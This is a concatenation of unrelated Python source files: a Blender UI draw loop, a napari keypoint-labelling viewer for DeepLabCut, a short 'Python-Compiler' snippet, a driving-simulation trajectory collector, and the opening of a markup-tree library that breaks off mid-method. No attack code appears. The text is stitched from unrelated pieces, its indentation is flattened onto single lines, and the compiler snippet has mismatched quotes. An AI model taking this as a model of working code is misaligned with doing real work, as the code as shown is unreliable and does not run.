self._focus.dispatch_event('on_focus') self._focus.dispatch_event('on_focusin', stop_at=stop_focus_at) @FSM.on_state('focus') def focus_main(self): if not self._focus: return 'main' if self._focus_full: pass if self.actions.pressed('LEFTMOUSE', unpress=False): return 'mousedown' # if self.actions.pressed('RIGHTMOUSE'): # self._debug_print(self._focus) # if self.actions.pressed('ESC'): # self.blur() # return 'main' self.handle_hover() self.handle_mousemove() self.handle_keypress() if not self._focus: return 'main' def force_clean(self, context): if self.defer_cleaning: return time_start = time.time() w,h = context.region.width, 
context.region.height sz = Size2D(width=w, max_width=w, height=h, max_height=h) UI_Element_PreventMultiCalls.reset_multicalls() Globals.ui_draw.update() if Globals.drawing.get_dpi_mult() != self._ui_scale: print(f'DPI CHANGED: {self._ui_scale} -> {Globals.drawing.get_dpi_mult()}') self._ui_scale = Globals.drawing.get_dpi_mult() self._body.dirty(cause='DPI changed', children=True) self._body.dirty_styling() self._body.dirty_flow(children=True) if (w,h) != self._last_sz: self._last_sz = (w,h) self._body.dirty_flow() # self._body.dirty('region size changed', 'style', children=True) # UI_Element_PreventMultiCalls.reset_multicalls() for o in self._callbacks['preclean']: o._call_preclean() self._body.clean() for o in self._callbacks['postclean']: o._call_postclean() self._body._layout( # linefitter=LineFitter(left=0, top=h-1, width=w, height=h), fitting_size=sz, fitting_pos=Point2D((0,h-1)), parent_size=sz, nonstatic_elem=self._body, table_data={}, ) self._body.set_view_size(sz) for o in self._callbacks['postflow']: o._call_postflow() for fn in self._callbacks['postflow once']: fn() self._callbacks['postflow once'].clear() # UI_Element_PreventMultiCalls.reset_multicalls() self._body._layout( # linefitter=LineFitter(left=0, top=h-1, width=w, height=h), fitting_size=sz, fitting_pos=Point2D((0,h-1)), parent_size=sz, nonstatic_elem=self._body, table_data={}, ) self._body.set_view_size(sz) if self._reposition_tooltip_before_draw: self._reposition_tooltip_before_draw = False self._reposition_tooltip() # @profiler.function def draw(self, context): if self._area != context.area: return Globals.drawing.glCheckError('UI_Document.draw: start') time_start = time.time() self.force_clean(context) Globals.drawing.glCheckError('UI_Document.draw: setting options') ScissorStack.start(context) bgl.glClearColor(0, 0, 0, 0) bgl.glBlendColor(0, 0, 0, 0) bgl.glBlendFunc(bgl.GL_SRC_ALPHA, bgl.GL_ONE_MINUS_SRC_ALPHA) bgl.glEnable(bgl.GL_BLEND) bgl.glEnable(bgl.GL_SCISSOR_TEST) bgl.glDisable(bgl.GL_DEPTH_TEST) bgl.glClear(bgl.GL_DEPTH_BUFFER_BIT) Globals.drawing.glCheckError('UI_Document.draw: drawing') self._body.draw() ScissorStack.end() self._draw_count += 1 self._draw_time += time.time() - time_start if self._draw_count % 100 == 0: fps = (self._draw_count / self._draw_time) if self._draw_time>0 else float('inf') self._draw_fps = fps # print('~%f fps (%f / %d = %f)' % (self._draw_fps, self._draw_time, self._draw_count, self._draw_time / self._draw_count)) self._draw_count = 0 self._draw_time = 0 Globals.drawing.glCheckError('UI_Document.draw: done') ui_document = Globals.set(UI_Document()) 10-100 # -*- coding: utf-8 -*- from . import auth from . import etc from . import errordlclabel/gui.py import napari import numpy as np import warnings from dlclabel.io import handle_path from dlclabel.layers import KeyPoints from dlclabel.widgets import KeypointsDropdownMenu from napari.layers import Image, Layer from PyQt5.QtWidgets import QMessageBox, QFileDialog from typing import List, Optional, Sequence, Union # TODO Add vectors for paths trajectory # TODO Add video reader plugin # TODO Refactor KeyPoints with KeyPointsData # Hack to save a KeyPoints layer without showing the Save dialog def _save_layers_dialog(self, selected=False): """Save layers (all or selected) to disk, using ``LayerList.save()``. Parameters ---------- selected : bool If True, only layers that are selected in the viewer will be saved. By default, all layers are saved. 
""" selected_layers = self.viewer.layers.selected msg = "" if not len(self.viewer.layers): msg = "There are no layers in the viewer to save" elif selected and not len(selected_layers): msg = ( 'Please select one or more layers to save,' '\nor use "Save all layers..."' ) if msg: QMessageBox.warning(self, "Nothing to save", msg, QMessageBox.Ok) return if len(selected_layers) == 1 and isinstance(selected_layers[0], KeyPoints): self.viewer.layers.save("", selected=True) else: filename, _ = QFileDialog.getSaveFileName( parent=self, caption=f'Save {"selected" if selected else "all"} layers', directory=self._last_visited_dir, # home dir by default ) if filename: self.viewer.layers.save(filename, selected=selected) class DLCViewer(napari.Viewer): def __init__(self): super(DLCViewer, self).__init__(title="deeplabcut") # Inherit parent class' key bindings self.class_keymap.update(super(DLCViewer, self).class_keymap) self.layers.events.changed.connect(self.on_change) self._dock_widgets = [] # Hack the QSS style sheet to add a KeyPoints layer type icon missing_style = """\n\nQLabel#KeyPoints { image: url(":/themes/{{ folder }}/new_points.svg"); }""" self.window.raw_stylesheet += missing_style self.window._update_palette(None) # Substitute default menu action with custom one for action in self.window.file_menu.actions(): if "save selected layer" in action.text().lower(): action.disconnect() action.triggered.connect( lambda: _save_layers_dialog( self.window.qt_viewer, selected=True, ) ) break # Storage for extra image metadata that are relevant to other layers. # These are updated anytime images are added to the Viewer # and passed on to the other layers upon creation. self._images_meta = dict() def on_change(self, event): if event.type == "added": layer = event.item root = layer.metadata.get("root") # Hack to have the save dialog open right in the labeled-data folder if root: self.window.qt_viewer._last_visited_dir = root if isinstance(layer, Image): paths = layer.metadata.get("paths") if paths is None: return # Store the metadata and pass them on to the other layers with warnings.catch_warnings(): warnings.simplefilter(action="ignore", category=FutureWarning) self._images_meta.update({"paths": paths, "shape": layer.shape}) for layer_ in self.layers: if not isinstance(layer_, Image): self._remap_frame_indices(layer_) # Ensure the images are always underneath the other layers n_layers = len(self.layers) if n_layers > 1: self.layers.move_selected(event.index, 0) elif isinstance(layer, KeyPoints): if not self._dock_widgets: menu = KeypointsDropdownMenu(layer) self._dock_widgets.append( self.window.add_dock_widget( menu, name="keypoints menu", area="bottom" ) ) layer.smart_reset(event=None) # Update current keypoint upon loading data self.bind_key("Down", layer.next_keypoint, overwrite=True) self.bind_key("Up", layer.prev_keypoint, overwrite=True) elif event.type == "removed": layer = event.item if isinstance(layer, KeyPoints): while self._dock_widgets: widget = self._dock_widgets.pop() self.window.remove_dock_widget(widget) elif isinstance(layer, Image): self._images_meta = dict() def _remap_frame_indices(self, layer: Layer): """Ensure consistency between layers' data and the corresponding images.""" if not self._images_meta: return new_paths = self._images_meta["paths"] paths = layer.metadata.get("paths") if paths is not None and np.any(layer.data): paths_map = dict(zip(range(len(paths)), paths)) # Discard data if there are missing frames missing = [i for i, path in paths_map.items() if path not in 
new_paths] if missing: if isinstance(layer.data, list): inds_to_remove = [ i for i, verts in enumerate(layer.data) if verts[0, 0] in missing ] else: inds_to_remove = np.flatnonzero(np.isin(layer.data[:, 0], missing)) layer.selected_data = inds_to_remove layer.remove_selected() for i in missing: paths_map.pop(i) # Check now whether there are new frames temp = {k: new_paths.index(v) for k, v in paths_map.items()} data = layer.data if isinstance(data, list): for verts in data: verts[:, 0] = np.vectorize(temp.get)(verts[:, 0]) else: data[:, 0] = np.vectorize(temp.get)(data[:, 0]) layer.data = data layer.metadata.update(self._images_meta) def _advance_step(self, event): ind = (self.dims.current_step[0] + 1) % self.dims.nsteps[0] self.dims.set_current_step(0, ind) def add_points( self, data=None, *, properties=None, text=None, symbol="o", size=10, edge_width=0, edge_color="black", edge_color_cycle=None, edge_colormap="viridis", edge_contrast_limits=None, face_color="white", face_color_cycle=None, face_colormap="viridis", face_contrast_limits=None, n_dimensional=False, name="keypoints", metadata=None, scale=None, translate=None, opacity=1, blending="translucent", visible=True, ) -> Optional[KeyPoints]: # Disable the creation of Points layers via the button if not properties: return layer = KeyPoints( data=data, properties=properties, text=text, symbol=symbol, size=size, edge_width=edge_width, edge_color=edge_color, edge_color_cycle=edge_color_cycle, edge_colormap=edge_colormap, edge_contrast_limits=edge_contrast_limits, face_color=face_color, face_color_cycle=face_color_cycle, face_colormap=face_colormap, face_contrast_limits=face_contrast_limits, n_dimensional=n_dimensional, name=name, metadata=metadata, scale=scale, translate=translate, opacity=opacity, blending=blending, visible=visible, ) self.dims.events.current_step.connect(layer.smart_reset, position="last") layer.events.query_next_frame.connect(self._advance_step) # Hack to avoid napari's silly variable type guess, # where property is understood as continuous if # there are more than 16 unique categories... 
with layer.block_update_properties(): layer.face_color = "label" layer.face_color_mode = "cycle" self.add_layer(layer) layer.mode = "add" return layer def add_layer(self, layer: Layer) -> Layer: if not isinstance(layer, Image): self._remap_frame_indices(layer) return super(DLCViewer, self).add_layer(layer) def open( self, path: Union[str, Sequence[str]], *, stack: bool = False, plugin: Optional[str] = None, layer_type: Optional[str] = None, **kwargs, ) -> List[Layer]: return super(DLCViewer, self).open( handle_path(path), stack=stack, plugin=plugin, layer_type=layer_type, **kwargs, ) def show(): with napari.gui_qt(): return DLCViewer() sanatb97/Python-Compiler x=4 y=7 while(y>x): print("y>x") y=y-1 if(x==y): print("x==y"") if(x==4): print("x="4") print('End of program'); import pickle import copy import os import numpy as np from rl.envs import make_vec_envs ''' collect trajectory data of other cars in the env and the label of the cars' traits make sure each trajectory has and only has one car device: cpu or cuda0 train_data: True if collect training data, False if collect testing data config: config object ''' def collectMany2OneData(device, train_data, config): # always use 'TIntersectionPredictFrontAct-v0', since the observation is compatible for both our method and Morton baseline env_name = 'TIntersectionPredictFrontAct-v0' # for render env_num = 1 if config.pretext.render else config.pretext.num_processes human_num = config.env_config.car.max_veh_num # create parallel envs envs = make_vec_envs(env_name, config.env_config.env.seed, env_num, config.env_config.reward.gamma, None, device, allow_early_resets=True, config=config, wrap_pytorch=False) # key list for observation from env ob_key_list = ['pretext_nodes', 'pretext_spatial_edges', 'pretext_temporal_edges', 'labels', 'pretext_masks', 'dones'] # key list for saved data save_key_list = ['pretext_nodes', 'pretext_spatial_edges', 'pretext_temporal_edges', 'labels'] # collect data for pretext training # list of dicts, the value of each key is a list of 30 data_list = [] # list for all data collected data = {} # buffer for data from env # initialize buffer to store data from env # each data[key] = list of traj_len, each element of the list = array (nenv, human_num, ?) for key in ob_key_list: data[key] = [] obs = envs.reset() # 1 epoch -> 1 file for epoch in range(10): print('collect data epoch', epoch) # how may traj do we want in one file # number of collected traj in a file will be >= config.pretext.num_data_per_file while(len(data_list)) < config.pretext.num_data_per_file: if config.pretext.render: envs.render() # NOTE: the robot doesn't move! 
action = np.zeros((env_num, ), dtype=int) # save the previous obs before it is overwritten prev_obs = copy.deepcopy(obs) obs, rew, done, info = envs.step(action) # pretext node: [px, ax] of other cars pretext_nodes = np.concatenate((prev_obs['pretext_nodes'], prev_obs['pretext_actions']), axis=-1) data['pretext_nodes'].append(copy.deepcopy(pretext_nodes)) data['pretext_spatial_edges'].append(copy.deepcopy(prev_obs['pretext_spatial_edges'])) data['pretext_temporal_edges'].append(copy.deepcopy(prev_obs['pretext_temporal_edges'])) data['labels'].append(copy.deepcopy(prev_obs['true_labels'])) data['pretext_masks'].append(copy.deepcopy(prev_obs['pretext_masks'])) data['dones'].append(copy.deepcopy(done)) # save data to data_list for every 20 steps if len(data['labels']) == config.pretext.num_steps: # process traj, keep the last sub-traj of non-dummy human in each traj processed_data = process_traj(data, save_key_list, env_num, config.pretext.num_steps, human_num) data_list.extend(copy.deepcopy(processed_data)) data.clear() for key in ob_key_list: data[key] = [] print('number of traj in a file:', len(data_list)) # save observations as pickle files # observations is a list of dict [{'x':, 'intent':, 'u':}, ...] filePath = os.path.join(config.pretext.data_save_dir, 'train') if train_data \ else os.path.join(config.pretext.data_save_dir, 'test') if not os.path.isdir(filePath): os.makedirs(filePath) filePath = os.path.join(filePath, str(epoch)+'.pickle') with open(filePath, 'wb') as f: pickle.dump(data_list, f, protocol=pickle.HIGHEST_PROTOCOL) data_list.clear() envs.close() ''' process the observation from env, and convert then to the saving format for training input data: dictionary of nested lists output return value: list of dictionaries of np array, where each dict = one traj data: traj_len steps of observation data from env, each key has value with shape [traj_len, nenv, human_num, ?] save_key_list: list of observation keys to be saved nenv: number of parallel env traj_len: max traj length of each traj, slice the input traj data into traj with length = traj_len human_num: max number of other cars in env ''' def process_traj(data, save_key_list, nenv, traj_len, human_num): new_data = [] # convert each key in data to np array for key in data: data[key] = np.array(data[key]) # calculate the start index for each traj humans_masks = np.array(data['pretext_masks']) # [traj_len, nenv, human_num] done_masks = np.expand_dims(np.array(data['dones']), axis=-1) # [traj_len, nenv, 1] # add a sentinel in the front humans_masks = np.concatenate((np.zeros((1, nenv, human_num)), humans_masks), axis=0) # 21, nenv, human_num humans_start_idx = np.logical_not(humans_masks).cumsum(axis=0).argmax(axis=0) done_masks = np.concatenate((np.zeros((1, nenv, 1), dtype=bool), done_masks), axis=0) done_start_idx = done_masks.cumsum(axis=0).argmax(axis=0) # if done_masks are all zeros, done_start_idx should be 0 start_idx = np.maximum(humans_start_idx, done_start_idx) # slice the traj and save in return value for i in range(nenv): # for each env for j in range(human_num): # if traj_len = 20, the largest max index is 18 (so that each traj has at least 2 steps) if start_idx[i, j] < traj_len-1: # the largest max index is 15 (so that each traj has at least 5 steps) # if start_idx[i, j] < traj_len - 4: cur_dict = {} for key in save_key_list: # only save one label for each traj if key == 'labels': cur_dict[key] = data[key][-1, i, j] else: # data[key]: [traj_len, nenv, human_num, ?] 
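# --- Illustrative aside, not part of process_traj's loop: a minimal sketch of the
# sentinel + cumsum + argmax trick used above (humans_start_idx / done_start_idx) to find
# the first step from which a car stays present through the end of the chunk. Shown for a
# single hypothetical (traj_len,) mask; the real code applies it over [traj_len, nenv, human_num].
def _start_idx_example():  # hypothetical helper for illustration only
    import numpy as np
    mask = np.array([0, 0, 1, 1, 1])                  # car absent for 2 steps, then present
    padded = np.concatenate(([0], mask))              # leading sentinel handles "present from t=0"
    start = np.logical_not(padded).cumsum().argmax()  # first index of the running maximum
    assert start == 2 and mask[start:].all()          # mask[start:] keeps only the present steps
    return start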
cur_dict[key] = data[key][start_idx[i, j]:, i, j] # change the px of pretext_nodes to odometry (displacement since 20 steps ago) cur_dict['pretext_nodes'][:, 0] = cur_dict['pretext_nodes'][:, 0] - cur_dict['pretext_nodes'][0, 0] # error check: all px must be non-negative assert (cur_dict['pretext_nodes'][:, 0] >= 0).all(), cur_dict['pretext_nodes'][:, 0] new_data.append(copy.deepcopy(cur_dict)) return new_data pithy/markup.py # Dedicated to the public domain under CC0: https://creativecommons.org/publicdomain/zero/1.0/. ''' Base Markup type for Html, Svg, Xml, as well as legacy SGML formats. ''' import re from collections import Counter from itertools import chain from typing import (Any, Callable, ClassVar, Dict, Generator, Iterable, Iterator, List, Match, Optional, Tuple, Type, TypeVar, Union, cast, overload) from xml.etree.ElementTree import Element from .desc import repr_lim from .exceptions import ConflictingValues, DeleteNode, FlattenNode, MultipleMatchesError, NoMatchError from .iterable import window_iter, window_pairs from .string import EscapedStr # Handle lxml comments if available; these are produced by html5_parser. try: from lxml.etree import Comment except ImportError: Comment = object() # type: ignore # Comment is a cyfunction, so we can fall back to a dummy object. _T = TypeVar('_T') # Attr values are currently Any so that we can preserve exact numerical values. MuAttrs = Dict[str,Any] MuAttrItem = Tuple[str,Any] MuChild = Union[str,'EscapedStr','Mu'] MuChildren = List[MuChild] MuChildOrChildren = Union[MuChild,Iterable[MuChild]] _Mu = TypeVar('_Mu', bound='Mu') _MuChild = TypeVar('_MuChild', bound='MuChild') MuPred = Callable[[_Mu],bool] MuVisitor = Callable[[_Mu],None] MuIterVisitor = Callable[[_Mu],Iterator[_T]] class Present: '''The Present class is used to only set an attribute if `is_present` evaluates to True.''' def __init__(self, is_present: Any): self.is_present = bool(is_present) class Mu: ''' Mu root class for building Html/Sgml/Xml document trees. Unlike xml.etree.ElementTree.Element, child nodes and text are interleaved. ''' tag = '' # Subclasses can override the class tag, or give each instance its own tag attribute. tag_types:ClassVar[dict[str,type['Mu']]] = {} # Dispatch table mapping tag names to Mu subtypes. inline_tags:ClassVar[frozenset[str]] = frozenset() # Set of tags that should be rendered inline. void_tags:ClassVar[frozenset[str]] = frozenset() # Set of tags that should be rendered as "void tags" (for HTML correctness). ws_sensitive_tags:ClassVar[frozenset[str]] = frozenset() # Set of tags that are whitespace sensitive. replaced_attrs:ClassVar[Dict[str,str]] = {} # Map of attribute names to replacement values for rendering. __slots__ = ('attrs', 'ch', '_orig', '_parent') def __init__(self:_Mu, *, tag:str='', attrs:MuAttrs=None, ch:MuChildOrChildren=(), cl:Iterable[str]=None, _orig:_Mu=None, _parent:'Mu'=None, **kw_attrs:Any) -> None: ''' Note: the initializer uses `attrs` dict and `ch` list references if provided, resulting in data sharing. This is done for two reasons: * avoid excess copying during deserialization from json, msgpack, or similar; * allow for creation of subtree nodes (with _orig/_parent set) that alias the `attr` and `ch` collections. Normally, nodes do not hold a reference to parent; this makes Mu trees acyclic. However, various Mu methods have a `traversable` option, which will return subtrees with the _orig/_parent refs set. Such "subtree nodes" can use the `next` and `prev` methods in addition to `pick` and friends. 
''' # TODO: handle tag!!! if attrs is None: attrs = {} # Important: use existing dict ref if provided. for k, v in kw_attrs.items(): attrs[k.replace('_', '-')] = v self.attrs = attrs if cl is not None: if not isinstance(cl, str): cl = ' '.join(cl) if cl != attrs.setdefault('class', cl): raise ConflictingValues((attrs['class'], cl)) if isinstance(ch, mu_child_classes): # Single child argument; wrap it in a list. self.ch:MuChildren = [ch] elif isinstance(ch, list): self.ch = ch # Important: use an existing list ref if provided. This allows subnodes to alias original contents. for c in ch: assert isinstance(c, mu_child_classes), c else: self.ch = list(ch) for c in self.ch: assert isinstance(c, mu_child_classes), c self._orig = _orig self._parent = _parent def __repr__(self) -> str: return f'{type(self).__name__}{self}' def __str__(self) -> str: subnode = '' if self._orig is None else '$' words = ''.join(chain( (xml_attr_summary(k, v, text_limit=32, all_attrs=False) for k, v in self.attrs.items()), (xml_child_summary(c, text_limit=32) for c in self.ch))) return f'<{subnode}{self.tag}:{words}>' def __delitem__(self, key:str) -> Any: del self.attrs[key] def __getitem__(self, key:str) -> Any: return self.attrs[key] def __setitem__(self, key:str, val:Any) -> Any: self.attrs[key] = val def get(self, key:str, default=None) -> Any: return self.attrs.get(key, default) def __iter__(self) -> Iterator[MuChild]: return iter(self.ch) @classmethod def from_raw(cls:Type[_Mu], raw:Dict) -> _Mu: 'Create a Mu object (or possibly a subclass instance chosen by tag) from a raw data dictionary.' tag = raw['tag'] attrs = raw['attrs'] raw_children = raw['ch'] if not isinstance(tag, str): raise ValueError(tag) if not isinstance(attrs, dict): raise ValueError(attrs) for k, v in attrs.items(): if not isinstance(k, str): raise ValueError(f'Mu attr key must be `str`; received: {k!r}') ch:MuChildren = [] for c in raw_children: if isinstance(c, mu_child_classes): ch.append(c) elif isinstance(c, dict): ch.append(cls.from_raw(c)) else: raise ValueError(f'Mu child must be `str`, `EscapedStr`, `Mu`, or `dict`; received: {c!r}') TagClass = cls.tag_types.get(tag, cls) return cast(_Mu, TagClass(tag=tag, attrs=attrs, ch=ch)) @classmethod def from_etree(cls:Type[_Mu], el:Element) -> _Mu: ''' Create an Mu object (possibly subclass by tag) from a standard library element tree. Note: this handles lxml comment objects specially, by turning them into nodes with a '!COMMENT' tag. ''' tag = el.tag if tag is Comment: tag = '!COMMENT' # `Comment` is a cython object; convert it to a string. # Collect children. attrs = el.attrib ch:MuChildren = [] text = el.text if text: ch.append(text) for child in el: ch.append(cls.from_etree(child)) text = child.tail if text: ch.append(text) TagClass = cls.tag_types.get(tag, cls) return cast(_Mu, TagClass(tag=tag, attrs=attrs, ch=ch)) @property def orig(self:_Mu) -> _Mu: 'If this node is a query subnode, return the original; otherwise raise ValueError.' if self._orig is None: raise ValueError(f'node is not a subnode: {self}') return self._orig @property def parent(self) -> 'Mu': 'If the node is a subnode, return the parent. Otherwise raise ValueError.' if self._parent is None: raise ValueError(f'node is not a subnode: {self}') return self._parent def subnode(self:_Mu, parent:'Mu') -> _Mu: 'Create a subnode for `self` referencing the provided `parent`.' 
if self._orig is not None: raise ValueError(f'node is already a subnode: {self}') return type(self)(tag=self.tag, attrs=self.attrs, ch=self.ch, _orig=self, _parent=parent) def child_items(self, ws=False, traversable=False) -> Iterator[Tuple[int,MuChild]]: 'Yield (index, child) pairs. If `ws` is False, then children that are purely whitespace will be filtered out.' for i, c in enumerate(self.ch): if isinstance(c, Mu): yield (i, (c.subnode(self) if traversable else c)) continue if isinstance(c, EscapedStr): c = c.string if not ws and html_ws_re.fullmatch(c): continue yield (i, c) def children(self, ws=False, traversable=False) -> Iterator[MuChild]: 'Yield child nodes and text. If `ws` is False, then children that are purely whitespace will be filtered out.' for c in self.ch: if isinstance(c, Mu): yield c.subnode(self) if traversable else c continue if isinstance(c, EscapedStr): c = c.string if not ws and html_ws_re.fullmatch(c): continue yield c def child_nodes(self, traversable=False) -> Iterator['Mu']: 'Yield child Mu nodes.' return ((c.subnode(self) if traversable else c) for c in self.ch if isinstance(c, Mu)) @property def has_substantial_children(self) -> bool: 'Predicate testing whether the node has non-whitespace children.' for c in self.ch: if isinstance(c, Mu): return True if isinstance(c, EscapedStr): c = c.string if c and not html_ws_re.fullmatch(c): return True return False @property def texts(self) -> Iterator[str]: 'Yield the text of the tree sequentially.' for c in self.ch: if isinstance(c, str): yield c elif isinstance(c, Mu): yield from c.texts elif isinstance(c, EscapedStr): yield c.string else: raise TypeError(repr(c)) # Expected str, Mu, or EscapedStr. @property def text(self) -> str: 'Return the text of the tree joined as a single string.' return ''.join(self.texts) @property def cl(self) -> str: '`cl` is shortand for the `class` attribute.' return str(self.attrs.get('class', '')) @cl.deleter def cl(self) -> None: del self.attrs['class'] @cl.setter def cl(self, val:str) -> None: self.attrs['class'] = val @property def classes(self) -> List[str]: 'The `class` attribute split into individual words.' 
return cast(str, self.attrs.get('class', '')).split() @classes.deleter def classes(self) -> None: del self.attrs['class'] @classes.setter def classes(self, val:Union[str, Iterable[str]]) -> None: if not isinstance(val, str): val = ' '.join(val) self.attrs['class'] = val def prepend_class(self, cl:str) -> None: try: existing = self.attrs['class'] except KeyError: self.attrs['class'] = cl else: self.attrs['class'] = f'{cl} {existing}' def append_class(self, cl:str) -> None: try: existing = self.attrs['class'] except KeyError: self.attrs['class'] = cl else: self.attrs['class'] = f'{existing} {cl}' @property def id(self) -> str: return str(self.attrs.get('id', '')) @id.setter def id(self, val:str) -> None: self.attrs['id'] = val @id.deleter def id(self) -> None: del self.attrs['id'] def all_ids(self) -> set[str]: ids = set() self.visit(pre=lambda node: ids.add(node.id)) return ids def unique_ids(self) -> set[str]: ids = Counter[str]() def count_ids(node:Mu) -> None: ids[node.id] += 1 self.visit(pre=count_ids) return { id for id, count in ids.items() if count == 1 } def unique_id(self, unique_id_set:set[str]) -> Optional[str]: id = self.id return id if id in unique_id_set else None def append(self, child:_MuChild) -> _MuChild: if isinstance(child, Mu) and child._orig is not None: child = child._orig if not isinstance(child, mu_child_classes): raise TypeError(child) self.ch.append(child) return child # type: ignore # The type of child._orig the same as child. def extend(self, children:Iterable[_MuChild]) -> None: for el in children: self.append(el) def _single(self, Child_type:Type[_Mu]) -> _Mu: for c in self.ch: if isinstance(c, Child_type): return c return self.append(Child_type()) def clean(self, deep=True) -> None: # Consolidate consecutive strings. ch:List[MuChild] = [] for c in self.ch: if isinstance(c, Mu): if deep: c.clean(deep) elif isinstance(c, str): if not c: continue # Do not append. if ch and isinstance(ch[-1], str): # Consolidate. ch[-1] += c continue # Do not append. else: raise ValueError(c) # Not mu_child_classes. ch.append(c) inline_tags = self.inline_tags if self.tag not in self.ws_sensitive_tags: # Strip strings adjacent to block elements. for i, (p, c, n) in enumerate(window_iter(ch, width=3), 1): if not isinstance(c, str): continue assert isinstance(p, Mu) assert isinstance(n, Mu) if p.tag not in inline_tags: c = c.lstrip() if n.tag not in inline_tags: c = c.rstrip() ch[i] = c # If this element is a block, strip text at beginning and end. if ch and self.tag not in inline_tags: c0 = ch[0] if isinstance(c0, str): ch[0] = c0.lstrip() cl = ch[-1] if isinstance(cl, str): ch[-1] = cl.rstrip() ch = [c for c in ch if c] # Filter now-empty text elements. # Reduce remaining, repeated whitespace down to single '\n' and ' ' characters. # https://www.w3.org/TR/CSS22/text.html#white-space-model # https://drafts.csswg.org/css-text-3/#white-space-phase-1 for i in range(len(ch)): c = ch[i] if isinstance(c, str): ch[i] = html_ws_re.sub(html_ws_replacement, c) self.ch[:] = ch # Mutate the original array beacuse it may be aliased by subnodes. # Picking and finding. @overload def pick_all(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> Iterator[_Mu]: ... @overload def pick_all(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> Iterator['Mu']: ... def pick_all(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): 'Pick all matching children of this node.' 
pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) return ((c.subnode(self) if traversable else c) for c in self.ch if isinstance(c, Mu) and pred(c)) @overload def find_all(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> Iterator[_Mu]: ... @overload def find_all(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> Iterator['Mu']: ... def find_all(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): 'Find matching nodes in the subtree rooted at this node.' pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) if text: return self._find_all_text(pred, traversable) else: return self._find_all(pred, traversable) def _find_all(self, pred:MuPred, traversable:bool) -> Iterator['Mu']: for c in self.ch: if isinstance(c, Mu): if pred(c): yield (c.subnode(self) if traversable else c) yield from c._find_all(pred, traversable) # Always search ch. TODO: use generator send() to let consumer decide? def _find_all_text(self, pred:MuPred, traversable:bool) -> Generator['Mu',None,bool]: ''' Use post-order algorithm to find matching text, and do not search parents of matching children. This is desirable because the calculation of text is expensive and the caller most likely does not want nodes that contain each other. ''' found_match = False for c in self.ch: if isinstance(c, Mu): child_match = yield from c._find_all_text(pred, traversable) if child_match: found_match = True elif pred(c): found_match = True yield (c.subnode(self) if traversable else c) return found_match @overload def pick_first(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def pick_first(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def pick_first(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) for c in self.ch: if isinstance(c, Mu) and pred(c): return (c.subnode(self) if traversable else c) raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) @overload def find_first(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def find_first(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def find_first(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): for c in self.find_all(type_or_tag=type_or_tag, cl=cl, text=text, traversable=traversable, **attrs): return c raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) @overload def pick(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def pick(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def pick(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): first_match:Optional[Mu] = None for c in self.pick_all(type_or_tag=type_or_tag, cl=cl, text=text, traversable=traversable, **attrs): if first_match is None: first_match = c else: args_msg = fmt_xml_predicate_args(type_or_tag, cl, text, attrs) subsequent_match = c # Alias improves readablity of the following line in stack traces. 
raise MultipleMatchesError(self, args_msg, first_match, subsequent_match) if first_match is None: raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) return first_match @overload def find(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def find(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def find(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): first_match:Optional[Mu] = None for c in self.find_all(type_or_tag=type_or_tag, cl=cl, text=text, traversable=traversable, **attrs): if first_match is None: first_match = c else: args_msg = fmt_xml_predicate_args(type_or_tag, cl, text, attrs) subsequent_match = c # Alias improves readablity of the following line in stack traces. raise MultipleMatchesError(self, args_msg, first_match, subsequent_match) if first_match is None: raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) return first_match # Traversal. @overload def next(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def next(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def next(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): if self._orig is None or self._parent is None: raise ValueError(f'cannot traverse non-subnode: {self}') pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) found_orig = False for c in self._parent.ch: if not isinstance(c, Mu): continue if found_orig: if pred(c): return (c.subnode(self._parent) if traversable else c) elif c is self._orig: found_orig = True if not found_orig: raise ValueError('node was removed from parent') raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) @overload def prev(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def prev(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def prev(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): if self._orig is None or self._parent is None: raise ValueError(f'cannot traverse non-subnode: {self}') pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) found_orig = False for c in reversed(self._parent.ch): if not isinstance(c, Mu): continue if 